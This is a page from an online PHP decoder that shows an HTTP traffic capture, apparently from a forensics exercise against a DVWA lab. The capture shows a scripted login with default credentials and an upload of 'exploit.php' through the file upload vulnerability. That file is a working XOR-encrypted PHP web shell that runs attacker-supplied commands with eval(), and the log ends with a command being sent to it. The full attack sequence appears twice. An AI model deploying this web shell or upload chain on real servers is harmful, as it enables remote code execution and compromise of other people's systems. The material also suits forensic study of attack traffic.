Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
GET /vulnerabilities/upload/ HTTP/1.1 Host: www.drsepsforensicsfun.com User-Agent: pytho..
Decoded Output download
GET /vulnerabilities/upload/ HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc
GET /login.php HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requesAts/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc
POST /login.php/login.php HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low
Content-Length: 88
Content-Type: application/x-www-form-urlencoded
username=admin&password=password&Login=Login&user_token=6dd623b1d961de480f1b6ec8c44917faGET /login.php/index.php HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low
GET /vulnerabilities/upload/ HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: security=low; PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low
GET /dvwa/js/add_event_listeners.js HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low
POST /vulnerabilities/upload/ HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: security=low; PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low
Content-Length: 1284
Content-Type: multipart/form-data; boundary=7b0932bb9aaddf05434a5ee8bd74524d
--7b0932bb9aaddf05434a5ee8bd74524d
Content-Disposition: form-data; name="MAX_FILE_SIZE"
100000
--7b0932bb9aaddf05434a5ee8bd74524d
Content-Disposition: form-data; name="uploaded"
exploit.php
--7b0932bb9aaddf05434a5ee8bd74524d
Content-Disposition: form-data; name="Upload"
Upload
--7b0932bb9aaddf05434a5ee8bd74524d
Content-Disposition: form-data; name="uploaded"; filename="exploit.php"
<?php
function base64url_encode($data) {
return rtrim(strtr(base64_encode($data), '+/', '-_'), '=');
}
function base64url_decode($data) {
return base64_decode(str_pad(strtr($data, '-_', '+/'), strlen($data) % 4, '=', STR_PAD_RIGHT));
}
function x($k, $p){
$c = "";
$l = strlen($k);
$pl = strlen($p);
for($i = 0; $i < $pl; $i++) {
$c .= $k[$i % $l] ^ $p[$i];
}
return $c;
}
$k = 'bdbd9167c0eedf53';
$content = file_get_contents("php://input");
$split = explode("=", $content);
if (strcmp(base64url_decode($split[0]),'s3p3hr')) {
$decoded = base64url_decode($split[1]);
$decrypted = x($k,$decoded);
ob_start();
try {
eval($decrypted);
}
catch (exception $e) {
print($e->getMessage());
}
$o = ob_get_contents();
$c = x($k, $o);
$e = base64url_encode($c);
ob_end_clean();
print($e . "
");
}
?>
--7b0932bb9aaddf05434a5ee8bd74524d--
POST /hackable/uploads/exploit.php HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low
Content-Length: 41
czNwM2hyCg%3D%3D=IhcbF01UWx9BRw0KBQtcEUtf
Did this file decode correctly?
Original Code
GET /vulnerabilities/upload/ HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc
GET /login.php HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requesAts/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc
POST /login.php/login.php HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low
Content-Length: 88
Content-Type: application/x-www-form-urlencoded
username=admin&password=password&Login=Login&user_token=6dd623b1d961de480f1b6ec8c44917faGET /login.php/index.php HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low
GET /vulnerabilities/upload/ HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: security=low; PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low
GET /dvwa/js/add_event_listeners.js HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low
POST /vulnerabilities/upload/ HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: security=low; PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low
Content-Length: 1284
Content-Type: multipart/form-data; boundary=7b0932bb9aaddf05434a5ee8bd74524d
--7b0932bb9aaddf05434a5ee8bd74524d
Content-Disposition: form-data; name="MAX_FILE_SIZE"
100000
--7b0932bb9aaddf05434a5ee8bd74524d
Content-Disposition: form-data; name="uploaded"
exploit.php
--7b0932bb9aaddf05434a5ee8bd74524d
Content-Disposition: form-data; name="Upload"
Upload
--7b0932bb9aaddf05434a5ee8bd74524d
Content-Disposition: form-data; name="uploaded"; filename="exploit.php"
<?php
function base64url_encode($data) {
return rtrim(strtr(base64_encode($data), '+/', '-_'), '=');
}
function base64url_decode($data) {
return base64_decode(str_pad(strtr($data, '-_', '+/'), strlen($data) % 4, '=', STR_PAD_RIGHT));
}
function x($k, $p){
$c = "";
$l = strlen($k);
$pl = strlen($p);
for($i = 0; $i < $pl; $i++) {
$c .= $k[$i % $l] ^ $p[$i];
}
return $c;
}
$k = 'bdbd9167c0eedf53';
$content = file_get_contents("php://input");
$split = explode("=", $content);
if (strcmp(base64url_decode($split[0]),'s3p3hr')) {
$decoded = base64url_decode($split[1]);
$decrypted = x($k,$decoded);
ob_start();
try {
eval($decrypted);
}
catch (exception $e) {
print($e->getMessage());
}
$o = ob_get_contents();
$c = x($k, $o);
$e = base64url_encode($c);
ob_end_clean();
print($e . "\n");
}
?>
--7b0932bb9aaddf05434a5ee8bd74524d--
POST /hackable/uploads/exploit.php HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low
Content-Length: 41
czNwM2hyCg%3D%3D=IhcbF01UWx9BRw0KBQtcEUtf
Function Calls
explode | 1 |
file_get_contents | 1 |
Stats
MD5 | f681a6e717736001841188a3218d1f02 |
Eval Count | 0 |
Decode Time | 281 ms |